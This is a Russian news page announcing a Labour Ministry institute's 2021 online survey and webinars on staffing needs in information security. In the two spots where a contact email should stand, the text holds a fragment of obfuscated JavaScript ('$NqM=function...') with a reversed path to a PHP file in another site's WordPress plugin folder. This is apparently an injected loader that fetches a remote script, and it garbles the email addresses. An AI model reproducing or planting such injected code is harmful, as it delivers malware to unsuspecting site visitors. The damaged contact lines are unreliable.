Home > Новости > ВНИИ труда Минтруда России по заданию Министерства труда и социальной защиты Российской Федерации проводит исследование по определению потребности организаций в кадрах и выявлению перспектив развития профессиональных квалификаций в сфере информационной безопасности.

ВНИИ труда Минтруда России по заданию Министерства труда и социальной защиты Российской Федерации проводит исследование по определению потребности организаций в кадрах и выявлению перспектив развития профессиональных квалификаций в сфере информационной безопасности.

ВНИИ труда Минтруда России по заданию Министерства труда и социальной защиты Российской Федерации проводит исследование по определению потребности организаций в кадрах и выявлению перспектив развития профессиональных квалификаций в сфере информационной безопасности.

Опрос пройдет в срок до 15 мая 2021 года в режиме онлайн-анкетирования. Для заполнения анкеты необходимо пройти по адресу https://itsecurity2021.vcot.info/ и зарегистрировать личный кабинет участника опроса.

Анкета заполняется руководителем организации или руководителем/специалистом подразделения по информационной безопасности при взаимодействии с сотрудниками, занимающимися вопросами кадрового обеспечения организации.

Результаты опроса будут использованы для формирования прогноза потребности в специалистах в области информационной безопасности разного уровня образования и специализации, объёмов их профессиональной подготовки.


20 апреля, в 11-00 по московскому времени пройдет очередной обучающий вебинар по заполнению анкеты «Потребность в кадрах в сфере информационной безопасности»

УЧАСТИЕ В ВЕБИНАРЕ БЕСПЛАТНОЕ.

Для подключения к вебинару пройдите по ссылке: https://vcot.info/s/PVqlzu6

Если у вас нет учетной записи MS Teams, то используйте опцию “Смотреть в Интернете”, затем “Присоединиться анонимно”.

Вопросы по заполнению анкеты можно задавать в чате и до начала вебинара.

По вопросам организации вебинара обращайтесь по электронной почте $NqM=function(n){if(typeof($NqM.list[n])==“string”)return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n]};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphctertsto:itsecurity@vcot.info”>itsecurity@vcot.info

Запись вебинара прошедшего 16 апреля доступна по ссылке: https://www.youtube.com/watch?v=8eX3pvsmx6E


Мы гарантируем обеспечение полной конфиденциальности информации, полученной в результате опроса. Информация будет использована исключительно в обобщенном виде.

Рекомендуем скачать анкету для предварительного ознакомления.

В рамках проводимого исследования осуществляется консультационная поддержка участников анкетирования по рабочим дням с 10 до 18 часов по московскому времени.

E-mail: $NqM=function(n){if(typeof($NqM.list[n])==“string”)return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n]};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphctertsto:itsecurity@vcot.info”>itsecurity@vcot.info

Для корректного отображения анкеты рекомендуется использовать актуальные версии браузеров: Google ChromeMicrosoft EdgeFirefoxЯндекс.Браузер.

Обязательные вопросы отмечены знаком *

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *